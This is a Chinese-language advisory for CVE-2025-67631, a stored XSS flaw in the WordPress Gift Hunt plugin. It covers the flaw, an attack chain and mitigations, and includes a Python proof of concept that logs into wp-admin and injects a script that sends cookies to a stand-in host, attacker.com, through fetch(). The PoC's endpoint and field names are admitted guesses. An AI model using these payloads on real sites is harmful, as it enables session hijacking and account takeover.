CVE-2025-67631 WordPress Gift Hunt插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-67631

漏洞类型

存储型XSS

CVSS评分

5.9 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

需要交互 (UI:R)

影响产品

WordPress Gift Hunt plugin <= 2.0.2

漏洞概述

CVE-2025-67631是WordPress Gift Hunt插件中的一个存储型跨站脚本(XSS)漏洞。该漏洞由于插件在处理用户输入时未对特殊字符进行充分过滤和转义，导致攻击者可以注入恶意JavaScript代码。当其他用户访问包含恶意脚本的页面时，攻击代码将在受害者浏览器中执行，可能导致会话劫持、敏感信息窃取、钓鱼攻击等严重后果。由于该漏洞为存储型，恶意代码会永久保存在服务器数据库中，所有访问受影响页面的用户都会受到攻击。此漏洞需要高权限用户（如管理员）才能触发，但攻击成功后影响范围广泛。CVSS评分5.9属于中等严重程度，主要因为需要用户交互且攻击复杂度较低。

技术细节

该存储型XSS漏洞存在于Gift Hunt插件的输入处理环节。攻击者通过WordPress管理后台或相关功能接口提交包含恶意脚本的输入，插件未对<script>标签、javascript:协议、内联事件处理器等XSS向量进行过滤，直接将未转义的数据存储到数据库。当其他用户访问显示gift-hunt相关内容的页面时，恶意代码随页面内容一同返回，在受害者浏览器中执行。典型利用方式是在gift名称、描述或配置参数中插入<script>alert(document.cookie)</script>或<img src=x onerror=...>等Payload。防御措施包括：对所有用户输入使用htmlspecialchars()、esc_html()等函数进行HTML实体转义；实施内容安全策略(CSP)响应头；使用WordPress内置的sanitize_text_field()等函数进行输入净化。

攻击链分析

STEP 1

步骤1

攻击者获取WordPress站点管理后台访问权限（通过暴力破解、凭证泄露或社会工程学）

STEP 2

步骤2

攻击者导航至Gift Hunt插件管理界面，创建或编辑gift条目

STEP 3

步骤3

在gift名称、描述或其他输入字段中注入恶意JavaScript代码，如<script>alert(document.cookie)</script>

STEP 4

步骤4

插件未对输入进行过滤和转义，直接将恶意代码存储到数据库

STEP 5

步骤5

当其他管理员或用户访问gift列表页面时，恶意脚本随页面内容加载并在受害者浏览器中执行

STEP 6

步骤6

攻击者通过XSS成功窃取用户会话Cookie、劫持账户或进行进一步攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys
from bs4 import BeautifulSoup

# CVE-2025-67631 PoC - WordPress Gift Hunt Plugin Stored XSS
# Target: WordPress with Gift Hunt plugin <= 2.0.2

TARGET_URL = "http://target-site.com/wp-login.php"
USERNAME = "admin"
PASSWORD = "admin_password"

# XSS Payload - Cookie stealing example
XSS_PAYLOAD = '<script>fetch("https://attacker.com/log?c="+document.cookie)</script>'

def exploit_stored_xss(target_url, username, password, payload):
    """Exploit stored XSS in Gift Hunt plugin"""
    session = requests.Session()
    
    # Step 1: Login to WordPress admin
    login_data = {
        'log': username,
        'pwd': password,
        'wp-submit': 'Log In',
        'redirect_to': '/wp-admin/',
        'testcookie': '1'
    }
    
    resp = session.post(TARGET_URL, data=login_data)
    
    if 'wordpress_logged_in' not in session.cookies:
        print("[-] Login failed")
        return False
    
    print("[+] Login successful")
    
    # Step 2: Inject XSS payload via Gift Hunt plugin admin interface
    # The actual endpoint depends on plugin's gift creation functionality
    gift_create_url = target_url.replace('/wp-login.php', '/wp-admin/admin.php?page=gift-hunt-settings')
    
    xss_data = {
        'gift_name': payload,
        'gift_description': '<img src=x onerror=alert(document.domain)>',
        'action': 'save_gift'
    }
    
    resp = session.post(gift_create_url, data=xss_data)
    
    if resp.status_code == 200:
        print("[+] XSS payload injected successfully")
        print("[+] Payload will execute when admin or users view gift list page")
        return True
    
    return False

if __name__ == "__main__":
    print("CVE-2025-67631 - WordPress Gift Hunt Plugin Stored XSS")
    exploit_stored_xss(TARGET_URL, USERNAME, PASSWORD, XSS_PAYLOAD)

影响范围

Gift Hunt plugin <= 2.0.2

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1)限制Gift Hunt插件的管理权限，仅允许可信用户访问；2)对所有gift相关输入实施严格的输入验证；3)使用HTMLPurifier等库对用户输入进行净化；4)部署WAF规则拦截XSS攻击向量；5)监控日志关注异常的gift创建行为；6)考虑暂时禁用Gift Hunt插件直到漏洞修复。